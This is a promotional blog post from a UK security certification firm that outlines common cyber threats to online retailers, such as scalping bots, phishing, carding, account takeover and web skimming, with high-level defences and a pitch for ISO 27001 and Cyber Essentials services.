For UK retailers, cyber crime is a major and expensive problem. With shopping now firmly based online, businesses rely on everything from e-commerce websites to mobile apps to serve their customers. While these digital tools are essential, they also give criminals more opportunities to attack.
The financial damage is significant, costing the retail industry millions each year and putting customer data at constant risk. To protect their business and their customers, retailers must first understand the most common types of cyber attacks they are up against.
Read the latest news about cyber attacks in the UK.
Retail Cyber Security Challenges
In 2025, cyber crime remained a significant threat to UK retailers. According to the Kantar cyber crime survey, 32% of retail and wholesale businesses experienced a breach or cyber attack in the past year. The British Retail Consortium has also reported that cyber attacks are one of the key concerns of retailers as retail crime spirals out of control. The organisation estimates the total cost of retail crime – including cyber – at £4.2 billion. Major incidents such as the 2025 attack on Marks & Spencer cost the business around £300 million.
Plus, AI is accelerating the issues with 91% of security experts warning that they expect a rise in AI-driven threats over the next few years.
Retail’s underlying vulnerability is its large attack surface, which keeps growing as e-commerce becomes the main business channel. This depends on lots of transactions and complex events that can’t easily be stopped or slowed down without hurting the business model. The digitisation of retail, proliferation of mobile apps, and integration of third-party services have made the sector especially attractive to attackers.
Ransomware gets a lot of attention, but e-commerce must also defend itself against retail-specific threats. These divide into two categories – routine threats, which every retailer must counter daily and the less common but potentially more serious ones. These include:
Scalping bots
A diverse category of automated software that buys up items in short supply – graphics cards, concert tickets, some trainers – so they can be resold at inflated prices. Scalpers are clever because humans can’t compete with their speed and accuracy, leaving online retailers to serve as unwitting middlemen for a market they have lost control of. In most but not all cases, they are not even illegal despite the harm they do to consumers and the brand reputation of retailers.
How could retailers protect themselves? This is not easy because while software systems can detect and limit bot activity, these programmes soon adapt – plus, the use of AI-powered bots has increased.
Social engineering and phishing
This attack targets people, not technology. Criminals use psychological manipulation to trick employees or customers into giving away sensitive information. Common retail examples include fake emails with malicious links (phishing), fraudulent phone calls to staff (vishing), or fake delivery texts to customers (smishing). These are all designed to steal credentials, money, or data.
How could retailers protect themselves? Regular staff training on how to spot these scams is the primary defence. This should be combined with technical controls like strong email filters and using multi-factor authentication (MFA) to ensure that stolen credentials alone are not enough to cause a breach.
Denial of inventory
Denial of inventory is a way of gaming e-commerce and online booking systems by holding goods in a checkout basket, stopping others from purchasing them. By the time goods are returned to sale, time has elapsed, and buyers have gone elsewhere. Akin to a denial-of-service attack but harder to block because it exploits the online sales process.
How could retailers protect themselves? Denial of inventory bots imitate a human mouse and keystrokes to evade detection by anti-bot systems. Machine learning-based defences are now standards to help to spot more subtle differences between human and machine interactions, but these are not foolproof
Fake merchandise and websites
Fake products are the problem retailers suspect they might have, but often can’t see because lost sales remain hidden. This issue predates e-commerce, but online shopping has made it much worse. Once, selling fakes on any scale required a shop – now anyone can copy a legitimate website. The Intellectual Property Office’s (IPO) Trading Standards survey highlights ongoing enforcement actions and warnings about fake goods sold online.
How could retailers protect themselves? Detecting fake online channels using digital risk protection (DRP) services that monitor website domains and social media channels for illicit activity.
Carding attacks
Criminals steal credit card data and test it out by attempting to buy goods at low values. If the card is genuine, they will then attempt to buy more expensive goods. Retailers run up expensive chargebacks, which hurt profits.
How could retailers protect themselves? A mixture of machine learning, IP reputation analysis, and browser validation (essentially trying to detect whether the browser looks like a normal agent rather than a bot simulation).
Account takeover (ATO) fraud
A cousin of credential stuffing, ATO fraud is a type of e-commerce attack in which criminals gain access to legitimate accounts using stolen credentials. This leads to a range of frauds, including buying goods, redeeming loyalty points, stealing credit card details, and identity fraud – or a combination of these. Another incarnation is to create fake accounts which are used to launder stolen funds into gift cards, create fake reviews, or carry out denial of inventory fraud.
How could retailers protect themselves? ATO attacks are hard to detect without risking false positives or putting people off with artificial barriers such as CAPTCHAs. As with the denial of inventory, the answer is probably more layers of machine learning to spot patterns of account creation.
Web skimming attacks
Perhaps the most feared of all, skimming attacks fully compromise a retailer’s checkout process. While a syndicate called Magecart first gained notoriety in 2018 with attacks on Ticketmaster and British Airways, these types of attacks have evolved and continue to impact retailers today.
Recent Magecart-style campaigns have used sophisticated techniques to target major UK online retailers such as Casio, making this a persistent and growing risk for the retail sector.
How could retailers protect themselves? A variety of tweaks can be made to make code injection harder and to properly audit e-commerce code and JavaScript.
Read about the latest cyber security trends.
Stronger Security Measures
Retailers can feel like sitting ducks that face being picked off even if they invest in expensive software protection. And yet in most types of e-commerce fraud, the core of the problem is a lack of control over customer accounts and how they are secured. It follows that anything that improves the security of those accounts such as multi-factor authentication (MFA) will make fraud harder.
That, and constant vigilance, assuming the system is under attack rather than waiting for the worst to happen. Many retailers are now also moving customers towards mobile apps (which is easier to control) and enhanced verification. The future of e-commerce will be based on identifying and authenticating the customer more systematically.
Stronger security measures like multi-factor authentication (MFA) and biometric login are now widely used. But just as important is the shift in mindset. Businesses are starting to assume that attempted breaches are happening all the time, not just occasionally.
Whether you are seeking ISO 27001 certification or simply aiming to improve your information security, implementing an ISMS is a great way to help your retail business manage sensitive information.
Cyber Essentials certification can also help your organisation improve its cyber framework and deliver better security for customers.
Get started on your journey to certification – get a quote today or contact our team of experts to discuss your needs.
